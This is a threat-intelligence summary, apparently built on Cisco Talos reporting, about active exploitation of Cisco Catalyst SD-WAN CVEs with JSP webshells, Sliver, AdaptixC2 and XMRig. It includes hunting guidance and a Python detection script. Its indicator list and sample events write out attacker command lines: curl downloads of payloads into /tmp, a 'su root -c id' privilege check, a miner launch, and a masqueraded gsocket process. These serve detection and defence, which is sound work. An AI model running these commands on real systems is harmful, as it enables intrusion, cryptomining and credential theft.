Severity: critical

Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities

Cisco Talos is tracking active exploitation of multiple vulnerabilities in Cisco Catalyst SD-WAN Controller and Manager. Threat actor UAT-8616 is exploiting CVE-2026-20182 for authentication bypass, while other clusters are chaining CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 to deploy JSP webshells and post-exploitation frameworks like Sliver and AdaptixC2.

Sensitivity: Immediate · Confidence: high · Analyzed: 2026-05-14

Authors: Cisco Talos

Actors: UAT-8616, ZeroZenX Labs, Cluster 1, Cluster 2, Cluster 3, Cluster 4, Cluster 5, Cluster 6, Cluster 7, Cluster 8, Cluster 9, Cluster 10

Source:Cisco Talos

IOCs · 41


What Happened

Cybersecurity researchers have identified hackers actively attacking Cisco Catalyst SD-WAN systems, which are used to manage corporate networks. The attackers are exploiting several software vulnerabilities to bypass login screens and gain full control over the affected devices. This matters because once inside, the hackers can steal sensitive credentials, install malicious software, or use the network's resources to mine cryptocurrency. Organizations using these Cisco products should immediately apply the security updates released by Cisco to protect their networks.

Key Takeaways

  • Active exploitation of CVE-2026-20182 by threat actor UAT-8616 to gain administrative privileges on Cisco Catalyst SD-WAN systems.
  • Widespread exploitation of chained vulnerabilities (CVE-2026-20133, CVE-2026-20128, CVE-2026-20122) by multiple distinct threat clusters.
  • Attackers are deploying various JSP webshells, including XenShell, Godzilla, and Behinder variants, to establish persistence.
  • Post-exploitation activities include deploying C2 frameworks (Sliver, AdaptixC2, Mythic), cryptominers (XMRig), and credential stealers.

Affected Systems

  • Cisco Catalyst SD-WAN Controller (formerly vSmart)
  • Cisco Catalyst SD-WAN Manager (formerly vManage)

Vulnerabilities (CVEs)

  • CVE-2026-20182
  • CVE-2026-20133
  • CVE-2026-20128
  • CVE-2026-20122
  • CVE-2026-20127

Attack Chain

Attackers gain initial access by exploiting vulnerabilities in Cisco Catalyst SD-WAN Manager and Controller, either via CVE-2026-20182 or a chain of CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122. Following successful exploitation, attackers deploy JSP webshells such as XenShell, Godzilla, or Behinder to establish persistence and execute arbitrary commands. Post-exploitation activities vary by cluster but include deploying C2 frameworks like Sliver and AdaptixC2, installing XMRig cryptominers, and executing scripts to steal credentials and escalate privileges to root.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: Yes
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Snort, ClamAV

Cisco Talos has provided Snort SIDs for network-based detection of the exploits and ClamAV signatures for the associated malicious tooling.

Detection Engineering Assessment

  • EDR Visibility: Medium. EDR agents deployed on the underlying Linux hosts can detect webshell file creation, suspicious child processes spawned from web services, and execution of known post-exploitation tools such as XMRig or Sliver.
  • Network Visibility: High. Exploitation occurs over the network against specific web application endpoints, and post-exploitation involves downloading payloads and communicating with external C2 servers.
  • Detection Difficulty: Moderate. While the initial exploit targets specific paths, the variety of webshells and post-exploitation tools requires a defense-in-depth approach that monitors for anomalous web server behavior and unexpected outbound connections.

Required Log Sources

  • Web Access Logs
  • Process Creation Logs
  • Network Traffic Logs

Hunting Hypotheses

Each hypothesis is listed with its telemetry source, ATT&CK stage, and false-positive risk.

  • Consider hunting for web server processes (e.g., Tomcat, Java) spawning unexpected shell processes (bash, sh), which may indicate webshell execution.
    • Telemetry: Process Creation Logs
    • ATT&CK Stage: Execution
    • FP Risk: Low
  • Evaluate whether there are unexpected .jsp files created in web-accessible directories, particularly those with randomized or suspicious names like sysv.jsp or conf.jsp.
    • Telemetry: File Creation Logs
    • ATT&CK Stage: Persistence
    • FP Risk: Low
  • If you have network visibility, consider hunting for outbound connections from SD-WAN infrastructure to unknown or untrusted IP addresses on non-standard ports.
    • Telemetry: Network Traffic Logs
    • ATT&CK Stage: Command and Control
    • FP Risk: Medium
  • Consider hunting for the execution of commands related to privilege escalation checks, such as 'su root -c id', originating from low-privileged user contexts.
    • Telemetry: Process Creation Logs
    • ATT&CK Stage: Privilege Escalation
    • FP Risk: Low

Control Gaps

  • Lack of network segmentation for management interfaces
  • Missing file integrity monitoring on web directories

Key Behavioral Indicators

  • Java/Tomcat processes spawning bash/sh
  • Creation of .jsp files in web directories
  • Execution of curl/wget to download files into /tmp
  • Processes executing with hidden or masqueraded names (e.g., exec -a '[mm_percpu_wq]')
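As an added example, not part of the Talos reporting or this summary, the following Python turns the hunting hypotheses and behavioral indicators above into a small rule set and runs it over constructed process- and file-creation events. The event field names, the web-root path and the placeholder download host are assumptions, not Catalyst SD-WAN telemetry.

```python
# Added example: score constructed process/file events against the hunting hypotheses.
# Event field names and WEB_ROOT are assumptions, not real Catalyst SD-WAN telemetry.
import re

WEB_PROCS = {"java", "tomcat", "catalina"}
SHELLS = {"sh", "bash", "dash"}
WEB_ROOT = "/opt/web/"              # assumed web-accessible directory
KTHREAD_NAME = re.compile(r"exec\s+-a\s+'?\[[^\]]+\]'?")   # exec -a '[kworker...]'
SU_CHECK = re.compile(r"\bsu\s+root\s+-c\s+id\b")

def classify(event):
    """Return a list of (rule, ATT&CK stage) hits for one event dict."""
    hits = []
    if event["type"] == "process":
        parent, image, cmd = event["parent"], event["image"], event["cmdline"]
        if parent in WEB_PROCS and image in SHELLS:
            hits.append(("web-process-spawns-shell", "Execution"))
        if image in {"curl", "wget"} and re.search(r"-[oO]\s+/tmp/", cmd):
            hits.append(("download-to-tmp", "Execution"))
        if KTHREAD_NAME.search(cmd):
            hits.append(("masqueraded-process-name", "Defense Evasion"))
        if SU_CHECK.search(cmd) and event.get("user") != "root":
            hits.append(("su-root-check", "Privilege Escalation"))
    elif event["type"] == "file_create":
        if event["path"].startswith(WEB_ROOT) and event["path"].endswith(".jsp"):
            hits.append(("jsp-dropped-in-webroot", "Persistence"))
    return hits

# Constructed sample telemetry; the command lines mirror those listed on this page.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "java", "image": "bash", "user": "vmanage",
     "cmdline": "bash -c id"},
    {"type": "process", "parent": "bash", "image": "curl", "user": "vmanage",
     "cmdline": "curl -sL -o /tmp/xmrig http://EXAMPLE-PLACEHOLDER/xmrig"},
    {"type": "process", "parent": "bash", "image": "su", "user": "vmanage",
     "cmdline": "su root -c id"},
    {"type": "process", "parent": "bash", "image": "bash", "user": "vmanage",
     "cmdline": "exec -a '[mm_percpu_wq]' '/tmp/.config/htop/defunct'"},
    {"type": "file_create", "path": "/opt/web/ROOT/conf.jsp"},
    {"type": "process", "parent": "systemd", "image": "bash", "user": "root",
     "cmdline": "bash /usr/local/bin/backup.sh"},   # benign: no hit expected
]

def hunt(events):
    # Keep only matching events, each paired with the rules it triggered.
    return [(e, h) for e in events for h in [classify(e)] if h]

if __name__ == "__main__":
    for event, hits in hunt(SAMPLE_EVENTS):
        print(hits, event.get("cmdline") or event.get("path"))
```

The benign `systemd`-spawned bash in the sample shows that the rules key on the parent process and the destination path, not on the presence of a shell alone.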

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Apply the security updates provided by Cisco for CVE-2026-20182, CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 immediately.
  • Consider isolating affected Cisco Catalyst SD-WAN Controllers and Managers from the internet if patching cannot be performed immediately.

Infrastructure Hardening

  • Evaluate whether management interfaces for SD-WAN infrastructure can be restricted to trusted internal IP ranges or accessed only via VPN.
  • Consider implementing File Integrity Monitoring (FIM) on critical web application directories to detect unauthorized webshell deployments.

User Protection

  • Consider enforcing strict least privilege access controls for administrative accounts on SD-WAN infrastructure.

Security Awareness

  • Ensure network administrators are aware of the critical need to promptly patch edge and management infrastructure.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Server Software Component: Web Shell
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1068 - Exploitation for Privilege Escalation
  • T1003 - OS Credential Dumping
  • T1496 - Resource Hijacking

Additional IOCs

  • Command Lines:
    • Purpose: Downloading XMRig payload and configuration via curl | Tools: curl, bash | Stage: Execution | curl -sL -o /tmp/xmrig
    • Purpose: Downloading Nim-based backdoor (agent1) via curl | Tools: curl, bash | Stage: Execution | curl -s https://... -o /tmp/agent1
    • Purpose: Executing privilege escalation check using hardcoded credentials | Tools: su | Stage: Privilege Escalation | su root -c id
    • Purpose: Executing XMRig miner in the background | Tools: bash | Stage: Execution | /tmp/moneroocean/miner.sh --config=/tmp/moneroocean/config_background.json
    • Purpose: Executing gsocket tool with masqueraded process name | Tools: bash, pkill | Stage: Defense Evasion | exec -a '[mm_percpu_wq]' '/tmp/.config/htop/defunct'
  • Other:
    • conf.jsp - Behinder webshell variant filename
    • sysinit.jsp - Behinder webshell variant filename
    • vmurnp_ikp.jsp - Godzilla webshell variant filename
    • systemd-resolved - AdaptixC2 payload filename
    • CWan - Sliver payload filename
    • agent1 - Nim-based backdoor filename
    • defunct.dat - gsocket configuration filename
    • loot_run.sh - Credential stealer script filename